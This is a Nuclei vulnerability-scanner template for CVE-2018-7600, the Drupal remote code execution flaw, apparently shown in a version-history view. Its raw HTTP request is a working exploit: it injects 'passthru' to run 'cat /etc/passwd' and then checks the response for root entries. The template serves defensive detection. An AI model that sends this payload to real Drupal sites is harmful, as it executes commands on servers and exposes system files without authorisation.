nuclei-templates/http/cves/2018/CVE-2018-7600.yaml

70 lines
2.2 KiB
YAML
Raw Normal View History

2021-02-15 13:33:33 +00:00
id: CVE-2018-7600
info:
name: Drupal - Remote Code Execution
2021-02-15 13:33:33 +00:00
author: pikpikcu
severity: critical
description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
reference:
- https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
- https://nvd.nist.gov/vuln/detail/CVE-2018-7600
- https://www.drupal.org/sa-core-2018-002
- https://groups.drupal.org/security/faq-2018-002
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-7600
cwe-id: CWE-20
2022-07-07 06:45:53 +00:00
metadata:
max-request: 1
2022-07-07 06:45:53 +00:00
shodan-query: http.component:"drupal"
tags: cve,cve2018,drupal,rce,kev,cisa,vulhub
2021-02-15 13:33:33 +00:00
http:
2021-02-15 13:33:33 +00:00
- raw:
- |
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Referer: {{Hostname}}/user/register
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#post_render][]"
passthru
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#type]"
markup
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#markup]"
cat /etc/passwd
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="form_id"
user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"
matchers-condition: and
matchers:
- type: word
words:
- "application/json"
part: header
2021-02-15 17:09:32 +00:00
2021-02-15 13:33:33 +00:00
- type: regex
regex:
- "root:.*:0:0:"
2021-02-15 13:33:33 +00:00
part: body
2021-02-15 17:09:32 +00:00
2021-02-15 13:33:33 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/05/13